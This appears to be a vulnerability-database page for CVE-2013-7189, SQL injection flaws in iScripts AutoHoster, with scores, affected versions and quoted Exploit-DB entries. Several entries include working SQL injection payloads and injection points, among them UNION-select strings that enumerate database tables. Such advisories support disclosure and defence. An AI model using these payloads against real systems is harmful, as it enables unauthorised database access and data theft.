CVE-2013-7189
published 2013-12-20CVE-2013-7189: Multiple SQL injection vulnerabilities in iScripts AutoHoster, possibly 2.4, allow remote attackers to execute arbitrary SQL commands via the cmbdomain…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.35%
68.2th percentile
Multiple SQL injection vulnerabilities in iScripts AutoHoster, possibly 2.4, allow remote attackers to execute arbitrary SQL commands via the cmbdomain parameter to (1) checktransferstatus.php, (2) checktransferstatusbck.php, or (3) additionalsettings.php; or (4) invno parameter to payinvoiceothers.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| iscripts | autohoster | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection
exploitdb·2013-12-15
CVE-2013-7189 iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection
iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection
---
source: https://www.securityfocus.com/bid/64377/info
iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
/checktransferstatusbck.php
Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_sche
Exploit-DB
iScripts AutoHoster - 'additionalsettings.php' SQL Injection
exploitdb·2013-12-15
CVE-2013-7189 iScripts AutoHoster - 'additionalsettings.php' SQL Injection
iScripts AutoHoster - 'additionalsettings.php' SQL Injection
---
source: https://www.securityfocus.com/bid/64377/info
iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
Time based Blind Injection
/additionalsettings.php
Post : submit=faris&cmbdomain=%Inject_Here%
Exploit-DB
iScripts AutoHoster - 'invno' SQL Injection
exploitdb·2013-12-15
CVE-2013-7189 iScripts AutoHoster - 'invno' SQL Injection
iScripts AutoHoster - 'invno' SQL Injection
---
source: https://www.securityfocus.com/bid/64377/info
iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
/payinvoiceothers.php
invno=%Inject_Here%
Exploit-DB
iScripts AutoHoster - 'checktransferstatus.php' SQL Injection
exploitdb·2013-12-15
CVE-2013-7189 iScripts AutoHoster - 'checktransferstatus.php' SQL Injection
iScripts AutoHoster - 'checktransferstatus.php' SQL Injection
---
source: https://www.securityfocus.com/bid/64377/info
iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
/checktransferstatus.php
Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=dat
No writeups or analysis indexed.
http://osvdb.org/101049http://osvdb.org/101050http://osvdb.org/101051http://osvdb.org/101053http://seclists.org/fulldisclosure/2013/Dec/121https://exchange.xforce.ibmcloud.com/vulnerabilities/89816http://osvdb.org/101049http://osvdb.org/101050http://osvdb.org/101051http://osvdb.org/101053http://seclists.org/fulldisclosure/2013/Dec/121https://exchange.xforce.ibmcloud.com/vulnerabilities/89816
2013-12-20
Published